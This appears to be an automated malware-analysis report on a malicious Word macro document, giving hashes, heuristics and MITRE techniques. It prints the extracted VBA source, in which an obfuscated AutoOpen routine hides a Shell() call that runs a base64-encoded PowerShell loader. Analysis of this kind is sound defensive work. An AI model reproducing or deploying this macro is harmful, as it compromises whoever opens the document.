Office (OLE) malware analysis — malicious · faba01a91a8a1d54

MALICIOUS

Office (OLE)

105.5 KB Created: 2018-06-01 15:54:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: e86b0be693e56330e42e5037ecf16fda SHA-1: a318b4a439f6ca329cb882f9bf9515cedbc45e54 SHA-256: faba01a91a8a1d54de6b9a00f65c8ccf64bbfe9990ae1073d3446f8293595839

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Autoopen macro triggers this functionality. The script attempts to construct and execute a PowerShell command, likely for downloading and executing a secondary payload. The obfuscated nature of the script and the lack of specific IOCs beyond the shell command itself prevent a higher confidence assessment.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10650 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10650 bytes
SHA-256: `a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "tdFNRaQVsjio" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function uibHIc() On Error Resume Next YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji zisoU = CSng(56708 * CInt(51425) + 47295 - 4207) PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968) uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA) ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648) End Function Sub Autoopen() On Error Resume Next GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088) uibHIc waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589) End Sub Attribute VB_Name = "ftjTiBnQtVNMKJ" Function JiHJpfwpl() On Error Resume Next GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975) RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ" IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454) OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg" kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009) dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA" RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142) jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6" TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351) HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg" CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107) juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU" AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276) sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw" JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ End Function Function waotA() On Error Resume Next Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888) DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA" BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621) dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA" HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318) zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg" SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214) hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV" EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185) oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI" Qcbutn = 22775 + Log(19 ... (truncated)

SHA-256: a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "tdFNRaQVsjio"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
zisoU = CSng(56708 * CInt(51425) + 47295 - 4207)
PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648)
End Function
Sub Autoopen()
On Error Resume Next
GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ
PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088)
uibHIc
waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ
iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589)
End Sub


Attribute VB_Name = "ftjTiBnQtVNMKJ"
Function JiHJpfwpl()
On Error Resume Next
GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud
OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975)
RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ"
IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw
vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454)
OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg"
kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki
oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009)
dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA"
RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn
PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142)
jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6"
TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd
QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351)
HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg"
CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR
ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107)
juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU"
AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA
mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276)
sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw"
JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ
End Function
Function waotA()
On Error Resume Next
Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT
FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888)
DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA"
BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw
PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621)
dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA"
HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd
rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318)
zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg"
SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt
LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214)
hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV"
EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv
GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185)
oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI"
Qcbutn = 22775 + Log(19
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.